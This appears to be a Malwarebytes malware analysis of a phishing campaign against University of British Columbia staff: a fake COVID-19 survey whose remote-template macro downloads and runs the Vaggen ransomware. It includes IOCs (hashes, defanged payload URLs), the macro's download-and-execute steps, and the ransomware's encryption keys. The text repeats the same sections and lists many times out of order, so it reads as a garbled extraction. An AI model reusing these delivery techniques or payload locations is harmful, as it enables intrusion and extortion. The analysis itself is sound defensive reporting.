This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1825 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1826 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives differ from the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims who want to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to\r\nBox and Dropbox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile-sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment to the file-sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file, since it was shared privately\r\nrather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to determine whether it was successful (the return value is the task ID of the\r\nexecuted application)\r\nIf successful, it sends a GET HTTP request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET HTTP request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted when a particular event occurs.\r\nThis can be very useful as an early-warning system signalling that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files, adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment\r\nequivalent to 80 USD, to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with\r\nXXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64, then decrypted with the\r\nhardcoded XXTEA key (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is implemented as the callback of the standard Go function\r\npath.filepath.Walk.\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption routine is similar to the one demonstrated here, using a hardcoded key and a 12-byte nonce\r\ngenerated by CryptGenRandom. The file content is encrypted with the gcm.Seal function.\r\nThe output file (with the .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that used a\r\nvery similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1843 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions 
belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1844 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1845 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1846 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1847 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. 
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1848 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1849 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1850 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1851 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. 
In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1852 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1853 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1854 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1855 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1856 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1857 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1858 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1859 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1860 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1861 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1862 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1863 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1864 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
